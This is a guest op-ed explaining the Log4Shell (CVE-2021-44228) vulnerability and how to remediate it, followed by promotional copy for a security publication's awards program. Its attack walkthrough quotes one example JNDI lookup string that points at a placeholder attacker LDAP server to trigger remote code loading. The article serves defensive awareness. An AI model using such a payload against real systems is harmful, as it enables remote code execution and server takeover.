Guest OpEd by Gilad David Maayan, CEO and Founder of Agile SEO
Log4j is a very popular logging package for Java. It is widely used by high-profile applications and services, including software from Google, Apple, Amazon Web Services, Microsoft Minecraft, the world’s #1 best-selling game, and even the software deployed on a NASA Mars rover.
Software using the Log4j package directly or indirectly impacts the lives of billions of people worldwide.
On December 9, 2021, the most significant zero-day exploit of recent years was found in Log4j. Labeled CVE-2021-44228, it identified the ability of attackers to perform remote code execution (RCE) and unauthenticated server-side request forgery (SSRF) by logging certain unauthenticated payloads.
Most importantly, the exploit can be activated without requiring any intervention from users.
The vulnerability was given a severity score of 10, the highest possible, and a rush began to remediate the millions of affected systems. Log4j became a top priority for the entire information security community.
(Experts are warning of a new cyber threat that may impact hundreds of millions of tech devices. Get some answers from cyber security expert Matt Barnett, CEO at SEVN-X about Log4j. Courtesy of NBC10 Philadelphia and YouTube. Posted on Dec 17, 2021.)
How Does the Log4j Vulnerability (Log4Shell) Work?
The Log4j vulnerability, commonly known as Log4Shell, affects the way Log4j handles log messages. An attacker could use Log4j to send a specially crafted message to the system, causing the system to load external code. This is known as remote command execution.
Here is the general flow of a Log4Shell attack:
-
An attacker sends a specially crafted string containing a malicious payload to a system vulnerable to CVE-2021-44228. This string can be sent from any field in the system record, such as user agent string, referrer, username or email address, device name, or free text input.
-
The string will look similar to this: ${jndi:ldap://malicious.com/evil} where malicious.com is an LDAP server controlled by the threat actor.
-
When a string like the above is passed to Log4j for logging, the payload triggers the Log4j vulnerability, and the vulnerable system uses Java Naming and Directory Interface (JNDI) to query the attacker-controlled LDAP server.
-
The attacker-controlled LDAP server responds with information about a remote Java class file. This Java class is deserialized and executed by the target system.
-
The attacking server now takes remote control of the target server, creating a reverse shell. Typically, the target server will be recruited into a botnet. Botnets use multiple hijacked computers to perform coordinated tasks on behalf of attackers.
Why is Log4j Vulnerability so Dangerous?
One of the main concerns about Log4Shell is its place in the software ecosystem. Logging is an essential feature of most software, and Log4j is in very common use among software developers.
This means hackers can choose from a menu of different targets, including home users, service providers, consumer software, and hardware devices.
Log4j vulnerable systems are now a prime target for attackers
Since the vulnerability was discovered, hackers started scanning the Internet for vulnerable servers to deliver malicious payloads. To launch an attack, they query a publicly available resource (such as a web server) and attempt to trigger a log message, such as a 404 error.
Then attackers inserts the malicious payload into their query, injecting it into the Log4j logs.
Many high-profile hackers have actively exploited Log4Shell. These range from ransomware groups targeting Minecraft servers to hacking groups attempting to mine Bitcoin, to state-sponsored Chinese and North Korean hackers. The Belgian Ministry of Defense has reported that its computers were attacked using Log4Shell.
Why organizations are slow to fix the Log4j vulnerability
Log4j is often bundled as part of other software, so it can be difficult to determine whether a particular software system uses Log4j. This requires developers and system administrators to conduct an inventory of the software components they are using.
While large companies like Amazon can quickly patch web services to prevent hackers from abusing them, other organizations need time to patch their systems. Some organizations have low security awareness or low visibility over the open source components used in their products, so they may not be aware they need to apply a patch.
In other cases, legacy systems may not support patching or updates at all. This is very common for connected medical devices.
Different approaches for remediation
Due to the versatility of the Log4j package, there are many possible solutions for patching it, depending on how Log4j is integrated into a particular system:
-
In some cases, there is a need to update the entire system or upgrade the entire software package that includes Log4j to a new version.
-
In other cases, there is a need to manually remove the vulnerable code through specific workarounds.
-
Some systems allow users to apply specific patches to remediate the vulnerability.
Ensuring that Log4j systems around the world receive their fixes requires coordination between the Log4j developers, software developers using Log4j, software distributors, system operators, and users.
This is a complex network of millions of organizations, and obviously, it will be a long time before all the systems that need a fix are actually updated.
How to Protect Against the Log4j Exploit
Here are several ways to protect against Log4j exploits:
Use network-based filtering –
-
Many organizations are not aware they are exposed to Log4j risks.
-
The risk can originate in the organization’s apps or an unpatched vendor app.
-
You can use network-based filtering or a web application firewall (WAF) to block potential exploits, including Log4j.
Scan applications –
-
Organizations can identify risks by scanning applications for vulnerable instances of Log4j.
-
Popular open-source scanning tools include CISA’s Cyber Hygiene Web Application Scanning and the CERT Coordination Center (CERT/CC).
Monitor for malicious traffic –
-
Log4j attacks started in December 2021, exposing many organizations to unidentified risks.
-
Threat hunting can help identify whether an organization has been breached.
-
It involves using log and operations monitoring tools to look for suspicious traffic proactively.
Patch and repeat –
-
After detecting vulnerable applications using Log4j, organizations should patch to the latest Log4j version.
-
Patching can remediate publicly disclosed and currently known Log4j vulnerabilities.
Implement DevSecOps –
-
The DevSecOps methodology incorporates security in all aspects of the development process.
-
The goal is to set up processes across the development and operational lifecycle to identify issues and enable a rapid rollout of fixes.
-
It enables organizations to remediate during early phases instead of scrambling to fix a flaw in production.
Conclusion
In this article, I explained the basic mechanism of the Log4j attack and explained why it is considered so severe.
Because Log4j is deployed in millions of software systems used by billions of users, it will take a long time for all these systems to be updated by their operators. In the meantime, any system with the vulnerability is wide open to attackers with no need for any user action.
I presented a few key steps organizations should take now to protect themselves and their customers:
-
Scan applications to identify the Log4j library
-
Patch to the latest version of Log4j or its containing software
-
Monitor traffic for Log4j attacks
-
Implement a DevSecOps strategy to ensure vulnerable libraries are not used in your systems, to begin with
I hope this will be useful as you plan your organization’s strategy for dealing with the Log4j threat.
About the Author
Gilad David Maayan is a technology writer who has worked with over 150 technology companies, including SAP, Imperva, Samsung NEXT, NetApp, and Ixia, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.
Today he heads Agile SEO, a leading marketing agency in the technology industry.
Related Technologies…
Cyemptive Technologies Takes Platinum for Best Anti-Malware in 2021 ‘ASTORS’ Awards
American Security Today’s Annual ‘ASTORS’ Awards is the preeminent U.S. Homeland Security Awards Program, and now entering it’s Seventh Year, continues to recognize industry leaders of Physical and Border Security, Cybersecurity, Emergency Preparedness – Management and Response, Law Enforcement, First Responders, as well as federal, state and municipal government agencies in the acknowledgment of their outstanding efforts to Keep our Nation Secure.
Cyemptive Technologies (First of Two)
Best Anti-Malware Solution
-
Zero Trust Access Solutions
-
Cyemptive Zero Trust Access (CZTA) enables an unprecedented additional protection layer and provides a revolutionary approach for VPNs (Virtual Private Networks).
-
Cyemptive was the first to detect VPN networks being compromised and quickly informed the DHS of the issues, and have discovered more than 10 security holes in existing VPN technologies that are not getting detected by current leading technology perimeter defense firewalls.
-
CZTA is an optional add-on module to Cyemptive Perimeter Fortress technology solution leading a revolutionary defense for VPNs and your remote workforce.
-
This Cyemptive protection tool is prepared for, and can prevent, quantum computing-based attacks from penetrating VPNs.
Cyemptive Technologies (Second of Two)
Best Cyber End-to-End Encryption Solution
-
Cyemptive Perimeter Fortress
-
The experience of having your firewall compromised and fooled in real-time is a common problem that often goes unnoticed.
-
If you are not seeing thousands of attacks per day defended in your current firewall, then there is a high chance you are not seeing or detecting the ones getting through.
-
Cyemptive’s Perimeter Fortress (CPF) defense technology successfully stops many of today’s most advanced global hackers in seconds.
-
CPF handles root-level attacks and base firmware attacks with ease using their patented cyberslice technology, and found over 300 zero days in 2019 alone.
-
The company’s integrated protection platform prevents the most elite hackers from compromising your perimeter defenses.
The Annual ‘ASTORS’ Awards highlight the most cutting-edge and forward-thinking security solutions coming onto the market today, to ensure our readers have the information they need to stay ahead of the competition and keep our Nation safe – one facility, street, and city at a time.
The United States was forever changed 20 years ago on September 11th, and we were fortunate to have many of those who responded to those horrific tragedies join us at the 2021 ‘ASTORS’ Awards Luncheon.
In the days that followed 9/11, the critical needs of protecting our country catapulted us into new and innovative ways to secure our homeland – which is how many of the agencies and enterprise organizations that are today ‘ASTORS’ Awards Champions, came into being.
Our 2021 keynote speaker featured a moving and informative address from TSA Administrator and Vice-Admiral of the United States Coast Guard (Ret), David Pekoske; to our attendees who traveled from across the United States and abroad, on the strategic priorities of the 64,000 member TSA workforce in securing the transportation system, enabling safe, and in many cases, contactless travel.
Legendary Police Commissioner William Bratton of the New York Police Department, the Boston Police Department, and former Chief of the Los Angeles Police Department was also live at the event, meeting with attendees and signing copies of his latest work ‘The Profession: A Memoir of Community, Race, and the Arc of Policing in America,’ courtesy of the generosity of our 2021 ‘ASTORS’ Awards Premier Sponsors.
The 2022 ‘ASTORS’ Awards Program is Proudly Sponsored by New PLATINUM SPONSOR: NEC National Security Systems (NSS), New Premier Sponsors Rajant Corporation, and guardDog AI, and returning Sponsors to date, ATI Systems, Automatic Systems, RX Global, and SIMS Software!
The continually evolving ‘ASTORS’ Awards Program will emphasize the trail of Accomplished Women in Leadership in 2022, as well as the Significance and Positive Impact of Advancing Diversity and Inclusion in our Next Generation of Government and Industry Leaders. #MentorshipMatters
So be on the lookout for exciting upcoming announcements of Speakers, Presenters, Book Signing Opportunities, and Attendees at the 2022 ‘ASTORS’ Awards Presentation Luncheon in November of 2022 in New York City!
Nominations are currently being accepted for the 2022 ‘ASTORS’ Homeland Security Awards at https://americansecuritytoday.com/ast-awards/.
Comprehensive List of Categories Include:
Access Control/ Identification | Personal/Protective Equipment | Law Enforcement Counter Terrorism |
Perimeter Barrier/ Deterrent System | Interagency Interdiction Operation | Cloud Computing/Storage Solution |
Facial/IRIS Recognition | Body Worn Video Product | Cyber Security |
Video Surveillance/VMS | Mobile Technology | Anti-Malware |
Audio Analytics | Disaster Preparedness | ID Management |
Thermal/Infrared Camera | Mass Notification System | Fire & Safety |
Metal/Weapon Detection | Rescue Operations | Critical Infrastructure |
License Plate Recognition | Detection Products | COVID Innovations |
Workforce Management | Government Security Programs | And Many Others to Choose From! |
Don’t see a Direct Hit for your Product, Agency or Organization?
Submit your category recommendation for consideration to Michael Madsen, AST Publisher at: mmadsen@americansecuritytoday.com.
In 2021 over 200 distinguished guests representing Federal, State, and Local Governments, and Industry Leading Corporate Firms gathered from across North America, Europe, and the Middle East to be honored among their peers in their respective fields which included:
-
The Transportation Security Administration (TSA)
-
ICE Homeland Security Investigations (ICE HSI)
-
Customs & Border Protection (CBP)
-
The Federal Protective Service (FPS)
-
Argonne National Laboratory (ANL)
-
DHS Science & Technology (S&T)
-
The National Center for Disaster Medicine & Public Health (NCDMPH)
-
The American Red Cross
-
The InfraGard National Alliance
-
The Metropolitan Police (MPD)
-
The U.S. Fire Administration (USFA)
-
Naval Postgraduate School Center for Homeland Defense and Security (CHDS)
-
The Federal Air Marshals Service
-
The San Diego Harbor Police Foundation, and Many More!
Register for the 2022 ‘ASTORS’ Luncheon Today
American Security Today is delighted to announce, that Deputy Executive Assistant Commissioner (DEAC) Diane J. Sabatino of the Office of Field Operations, U.S. Customs and Border Protection (CBP), will be the opening keynote speaker at the much-anticipated 2022 ‘ASTORS’ Awards Presentation Luncheon, on Wednesday, November 16th, 2022.
American Security Today’s Annual ‘ASTORS’ Awards is the preeminent U.S. Homeland Security Awards Program, and now in its Seventh Year, continues to recognize industry leaders of Physical and Border Security, Cybersecurity, Emergency Preparedness – Management and Response, Law Enforcement, First Responders, as well as federal, state and municipal government agencies in the acknowledgment of their outstanding efforts to Keep our Nation Secure.
To take advantage of this exclusive luncheon opportunity to invite your team, guests, clients, and show visitors to a gourmet, affordable, plated meal event in the heart of New York City, for a fabulous networking opportunity!
Go to https://americansecuritytoday.com/product/awards-luncheon/ to secure your seat or reserve a table. ***Limited space available so Register Today. There will be no on-site registrations.
Your ‘ASTORS’ Awards Luncheon registration includes complimentary attendee access to ISC East where you can meet the world’s most innovative suppliers and cyber experts, immerse yourself in hands-on tech and learn from world-renowned speakers and thought-leaders.
Why American Security Today?
The traditional security marketplace has long been covered by a host of publications putting forward the old school basics to what is Today – a fast-changing security landscape.
American Security Today is uniquely focused on the broader Homeland Security & Public Safety marketplace with over 75,000 readers at the Federal, State, and local levels of government as well as firms allied to the government.
American Security Today brings forward a fresh compelling look and read with our customized digital publications that hold readers’ eyes throughout the story with cutting-edge editorial that provides solutions to their challenges.
Harness the Power of the Web – with our 100% Mobile Friendly Publications
AST Digital Publications are distributed to over 75,000 qualified government and homeland security professionals, in federal, state, local, and private security sectors.
‘PROTECTING OUR NATION, ONE CITY AT A TIME’
AST Reaches both Private & Public Experts, essential to meeting these new challenges.
Today’s new generation of public safety and security experts need real-time knowledge to deal with domestic and international terrorism, lone wolf attacks, unprecedented urban violence, shifts in society, culture, and media bias – making it increasingly difficult for Homeland Security, Law Enforcement, First Responders, Military and Private Security Professionals to implement coordinated security measures to ensure national security and improve public safety.
These experts are from Government at the federal, state, and local level as well as from private firms allied to the government.
AST provides a full plate of topics in our AST Monthly Magazine Editions, AST Website, and AST Daily News Alerts, covering 23 Vital Sectors such as Access Control, Perimeter Protection, Video Surveillance/Analytics, Airport Security, Border Security, CBRNE Detection, Border Security, Ports, Cybersecurity, Networking Security, Encryption, Law Enforcement, First Responders, Campus Security, Security Services, Corporate Facilities, and Emergency Response among others.
AST has Expanded readership into integral Critical Infrastructure audiences such as Protection of Nuclear Facilities, Water Plants & Dams, Bridges & Tunnels, and other potential targets of terrorism.
Other areas of concern include Transportation Hubs, Public Assemblies, Government Facilities, Sporting & Concert Stadiums, our Nation’s Schools & Universities, and Commercial Business Destinations – all enticing targets due to the large number of persons and resources clustered together.
(See just a few highlights of American Security Today’s 2021 ‘ASTORS’ Awards Presentation Luncheon at ISC East. Courtesy of My Pristine Images and Vimeo.)
To learn more about ‘ASTORS’ Homeland Security Award Winners solutions, please see the 2021 ‘ASTORS’ CHAMPIONS Edition Fully Interactive Magazine – the Best Products of 2021 ‘A Year in Review’.
The Annual CHAMPIONS edition includes a review of Annual ‘ASTORS’ Award Winning products and programs, highlighting key details on many of the winning firm’s products and services, including video interviews and more.
It serves as your Go-To Source throughout the year for ‘The Best of 2021 Products and Services‘ endorsed by American Security Today, and can satisfy your agency’s and/or organization’s most pressing Homeland Security and Public Safety needs.
From Physical Security (Access Control, Critical Infrastructure, Perimeter Protection, and Video Surveillance Cameras and Video Management Systems), to IT Security (Cybersecurity, Encryption, Data Storage, Anti-Malware and Networking Security – Just to name a few), the 2021 ‘ASTORS’ CHAMPIONS EDITION has what you need to Detect, Delay, Respond to, and Mitigate today’s real-time threats in our constantly evolving security landscape.
It also includes featured guest editorial pieces from some of the security industry’s most respected leaders, and recognized firms in the 2021 ‘ASTORS’ Awards Program.
-
For a complete list of 2021 ‘ASTORS’ Award Winners, begin HERE.
For more information on All Things American Security Today, as well as the 2021 ‘ASTORS’ Awards Program, please contact Michael Madsen, AST Publisher at mmadsen@americansecuritytoday.com.
AST strives to meet a 3 STAR trustworthiness rating, based on the following criteria:
- Provides named sources
- Reported by more than one notable outlet
- Includes supporting video, direct statements, or photos